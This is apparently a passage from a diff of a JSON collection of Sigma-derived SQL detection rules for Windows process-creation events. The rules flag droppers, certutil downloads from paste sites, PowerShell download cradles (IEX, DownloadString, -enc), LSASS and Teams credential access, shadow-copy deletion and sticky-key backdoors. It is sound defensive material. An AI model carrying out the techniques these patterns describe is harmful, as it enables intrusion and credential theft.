"Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - 